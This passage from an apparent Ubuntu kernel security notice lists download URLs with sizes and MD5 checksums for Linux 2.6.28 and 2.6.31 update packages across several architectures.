http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:   194830 74b0f571685be779768609c16a414346
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:   153010 3f9d7d19adf9afb4419a80ad04231009
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    36498 fd7232b8dcf13ff08280ca63caeae302
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:     5838 1cc67d1a6c420276e6f59db3ed9942c8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    72150 a499b73933f58ec19e04b6428fb82185
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    22718 56724a5b7bcc91aff7be15700c0a82ad
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:     8874 a4f0e53f6b6d2cacf54c6a9ac9eab37c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    47442 b366ca0d5084bac531ddfbb50a9d51a2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    15662 a0d315f845d9b5688dd17954a62f9d92
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:  1273634 e0047421d0cb50d5b39c75c97274697a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    47210 8ea312e79dd8c391c34b6b69cd257977
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    72702 c6ffab61cbfcfdc2e32cbf60f1d4958a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:   126982 d6ede00cbf90e3b77fb8472fb3a9ee2d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    13472 d48c09cb3270f0372ba5adfbba467306

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:   215872 98aa4e99386167781b23b5504cbc8591
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    46666 ede37f43ef40b34f9d77fc4640514651
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    41356 cb2e3f87cf5642a12835a48f2f7efa8b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    47404 aeaca1593385350dc704f57aaf625b73
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    86924 5ea2819a5c30ce4c89a2bce2bd4627aa
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    33574 2cb4c345fe2fb221897102c5014d2017
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:   525756 f090c1ccf69ddb2820186927c85dcd98
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:   125642 86e82e5dd9d4f57969d66c72ec5f41eb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    54880 6e13577469a187fece4e004a80668b48
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:   301354 a8a087c11396b663d52e6fbb2fc419e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:  3744732 3bf841c6e53f9a9d6c352609cd21570b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-19-generic_2.6.28-19.61_i386.deb
  Size/MD5:   674722 ae9bf80ad2a72a2eab03a182d0b076ec
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-19-server_2.6.28-19.61_i386.deb
  Size/MD5:   676386 672cfd17c45527cfcc4b74abad9f652d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-generic_2.6.28-19.61_i386.deb
  Size/MD5: 24657574 7a23546eec680913e2335da9389181da
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-server_2.6.28-19.61_i386.deb
  Size/MD5: 24781358 fd198c0b13ba70eadc83348ae87cf2f0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-virtual_2.6.28-19.61_i386.deb
  Size/MD5: 10250202 cdd81611c7865173650be382716316c0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-19.61_i386.deb
  Size/MD5:   767068 fbe363b42e813979a49a7444adface7c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:   218104 238d1fa355579b3e5c3b9a5f409ba412
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:   174930 6c69f1ebda0371c7145ba0889931890b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    30066 f825580f63a3220d9ec048f5660309c4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:   262836 1ea6cea34f931354abe2c01aa8698f01
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:  2110024 0ad4a3aab3642c6ff44b65e2155483d2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:   150224 04dcd6e520494576ac6e06aa863e73d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:   184330 40e357d4f7c99b886a6b7a00170177a4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:   143594 38768a0d3f979c7cd662d6f2d23b4a68
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    34576 dd9d68b4aa49cd96d1a4957ea1758668
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:     5506 9e285ac21f1486b3ac73103b3e96fd40
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    86008 578f19d536439c1b0aada7f86ccb7241
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    47638 fe2306b25d5f55bd6566a0c2291505dd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:     8714 342c255e7f6fb6cc33b68075f0e21550
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    44690 94d2c332f5947f4dce037570ce39b35e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    14778 0fe26ba732bfbe35baf944ae3b0e0bf2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:  1446006 a016a4624c870f7359e89d436e94bfca
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    44098 8a7b3746af4ee04b564c8bd8caf17027
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    69286 f10cde36cc89019b0a2cc3ca37dd1570
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:   119542 b1a3003512dc0814ad58c46d29cea106
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    12676 17546e9dd8ca873e2b2ab89c04274faf

lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:   215272 2da99e7865fed571480c1daf83362c2c
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:    46658 d88e490bb0b9783884ee8c7d7268af02
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:    40958 658c3596adb419ab460d1bec285c84ea
http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:    47310 20f31bf3e8154ce4e165a26ee05829b0
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:    86524 220c27bce804ca2f28a07b1aa05a6724
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:    33270 77f0d3419e8bce3aadab46745a89da47
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:   523812 ca9ae4910b3b80db2b5f66df497b97bf
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:   125274 df84493025631f40a26684e18fcbdcad
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:    63562 aa198524f22feac47e6afeb90b4814a3
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:   300758 e2f88dfcf8062c76ba8feb73009c470c
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:  3036096 18ba173775e4bd72614757f96464f43b
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.28-19-lpia_2.6.28-19.61_lpia.deb
  Size/MD5:   643960 a59344b6416b7986fc4e381d2cff448b
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.28-19-lpia_2.6.28-19.61_lpia.deb
  Size/MD5: 21804176 6d5ada4bd63dc0267ec128ec5523d603
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.28-19.61_lpia.deb
  Size/MD5:   767048 119ec87226497a4cd35ac1616c110f8b
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:   303974 013d213d0147879eaf3b03ee5a52ba62
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:   157420 daa1b45750cf096ca0f21c2e9805338c
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:    24444 a4604496dbae27099d5e99be02661e86
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:   260358 050d3379257c6db05af1d9cbea5246e5
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:  2027504 b41779f2e28f1a64bfef1328e0d46025
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:   149404 0b24ae1029ee3377f090ce81937f591b
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:   184738 4a4709ebe1e07dba8e80164d5d99457e
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:   143256 93d56d8675a88d483b206a0bd915cc10
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:    34466 b307ad93ea4f7c264c20833070f32599
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:     5496 ae5a05934e8cb5b52e0793ba2bf8804b
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:    85658 c8746bbbb6796a2bff3fa6b336ed74b4
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:    47404 6230bb1e8b46bd653ac5d3ef9d9052b7
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:     8712 fed56dd339cc12bb2c623a54da9d5b3a
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:    63108 18cf630fa14beb0692f7398167e8b691
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:    14718 8ee6802e848c75ca39da8ee1e02f0314
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:  1447856 77369ff1a3bd4417251f3f1de7dc504f
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:    43896 f514d1c6dc5f0edf987eab1993eff850
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:   155176 0dd0d60e9685c6f1f092e7fba12f0d2c
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:   172682 daee398b65ec579129a974398bafe526
http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:     8152 f19e4bed18e1f803f2403c1f76bb4567

Updated packages for Ubuntu 9.10:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-307.15.diff.gz
  Size/MD5:  9270340 efbacad31add4310d608052e0138cdfc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-307.15.dsc
  Size/MD5:     2706 ab7417b57fac2e918ab18b71748eaa25
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31.orig.tar.gz
  Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-112.28.diff.gz
  Size/MD5:  4002602 7156a2ff98e4a29eca8db92dd27cae34
http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-112.28.dsc
  Size/MD5:     2180 e004ede760b9ead8acfb08aae3626bd8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31.orig.tar.gz
  Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-214.28.diff.gz
  Size/MD5:  4613937 a6d34bc737f45065a7856ca478f09ded
http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-214.28.dsc
  Size/MD5:     2214 2387eb27814bd67f0788fd0450f400ab
http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31.orig.tar.gz
  Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-22.60.diff.gz
  Size/MD5:  2968144 51d9f41be632d0069d48b6fb7c53b059
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-22.60.dsc
  Size/MD5:     3782 1027672ce46ed3c00dd0fcc4682a64f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31.orig.tar.gz
  Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-doc_2.6.31-307.15_all.deb
  Size/MD5:  3801110 11ec385a097f99220d5ddb6c2e2f4002
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-source-2.6.31_2.6.31-307.15_all.deb
  Size/MD5: 64261132 ed0333508c22109f028ae2ef766fc85f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-307_2.6.31-307.15_all.deb
  Size/MD5:  9674276 489c1295818e3e5ee4832104c483a0ee
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.31-22.60_all.deb
  Size/MD5:  3802616 a36b05da0395ec7db681dc19fb2f1300
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22_2.6.31-22.60_all.deb
  Size/MD5:  9542888 f10672f2db8403df76eca5b20694b8f3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.31_2.6.31-22.60_all.deb
  Size/MD5: 62194756 b7cc137763d5af113a71e31e6ac22f78

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-307-ec2_2.6.31-307.15_amd64.deb
  Size/MD5:   611656 2c695d1b064b808c1a2302ab2b886977
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-307-ec2_2.6.31-307.15_amd64.deb
  Size/MD5: 18766724 49915d82add98b1256e69fe1bfe8078e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:   221404 254b05d713505665c031b4496b163c22
http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    15634 c74946f44729c910272e9ea7818630b2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    52140 f69d9ea44c436108e9d12948b8136090
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    44830 cf091e89005a5a90931b7f752bdadf69
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    50086 7aeca28683007786d5ebd9ef1ed3ac26
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    92532 b98c59ba794fd8779c7d72bfaaed0197
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    37776 b8bef8f976de7b77be419a138bcae78b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:   537596 6b955d65ff2d68e8d95051cf094907c3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:   130680 f33ba0ee944acc4719c2967a1dcabdb3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    53836 f67f7cc6ef67dcf7f672fd569a89452f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:   310082 9c1873f4f9d43672eb590a7321e1d6f3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:  4360720 16490513f45ae6688ed2bde11abf9e81
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22-generic_2.6.31-22.60_amd64.deb
  Size/MD5:   708238 ece5100190ee7b1cfe205a988482f652
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22-server_2.6.31-22.60_amd64.deb
  Size/MD5:   706794 eabe25a6ab5ecf566b6155d1e40b098b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-generic_2.6.31-22.60_amd64.deb
  Size/MD5: 28945438 dcaf7dcfd8fd1bb8396403a8385f00c6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-server_2.6.31-22.60_amd64.deb
  Size/MD5: 28940552 0345077dd48fee880de7036f7b9565ea
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-virtual_2.6.31-22.60_amd64.deb
  Size/MD5: 11766174 dd131468e97785447d16e271b9f0c96e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-22.60_amd64.deb
  Size/MD5:   753492 0a0b60ed5f9fd5317d117b348c25a226
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:   168332 2698dddf736f1f55b43ee796f36025d4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:   202808 83c4daba95357805420dfd042b326624
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    27744 04f33c682c35a27fb0622c0ccfc64539
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:   311822 4748943e01de51f9fa0afe1e6667ba11
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:  2281794 cc0444cb92dfe6d42f1c29cf37020399
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:   158660 ddaf46384d9657ea1afd15f0b7a04381
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:   203114 0a8ba89a3ac2c15fba026750b7724b9a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:   161070 67957e42b693445a8bec0d1e65e55026
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    38052 7f306f8d2cab050417d6cb38857b5d5a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:     5762 39e5dbb1081ba9537468d1a927fd0da2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    73772 a4bad6ca01c03a927453ad26b099cce4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    22250 53b93aabb270063d193571b49d95b9e6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:     9538 29dde3870380ac336fbacaf92ba229ea
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    39852 7e7b6dc05ceb31ac128631131cc4d523
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    23488 023007868ca9edada0fb2c92805d9683
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:  1389890 cb421da7cd9f9dc1c2b7920d3cbd5d26
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    47372 76db327e946e56267ebb075149dd74d6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    51746 2d218a60e0c7df2b655e8dbde3b8fde0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:   129008 8e259b2e63ad1b7540ab5e280fd1185b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    15818 bd77ac1c53d4013fd44d6e08e0607a0d

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-307-ec2_2.6.31-307.15_i386.deb
  Size/MD5:   583698 c74a1a2666674f9f7868022638a44eec
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-307-ec2_2.6.31-307.15_i386.deb
  Size/MD5: 18098198 aa80a9877a0e8e66b3eaeedf106d2735
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:   198856 75a1fabea67826c04b3f970855301f66
http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    32460 debd7f409c0590fbf8c54e4bfd353b0a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    49946 a1fd0118b8702be8c81173ac13de49f0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    42114 8ad595e8510acc850d85f2b15409c398
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    45944 fe33cb34669e234be9c67b10786438e4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    87406 f8c4148cb3a8f30c7a59e5dae4771175
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    33766 fbea3cb1763e19feb0994cf8500132de
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
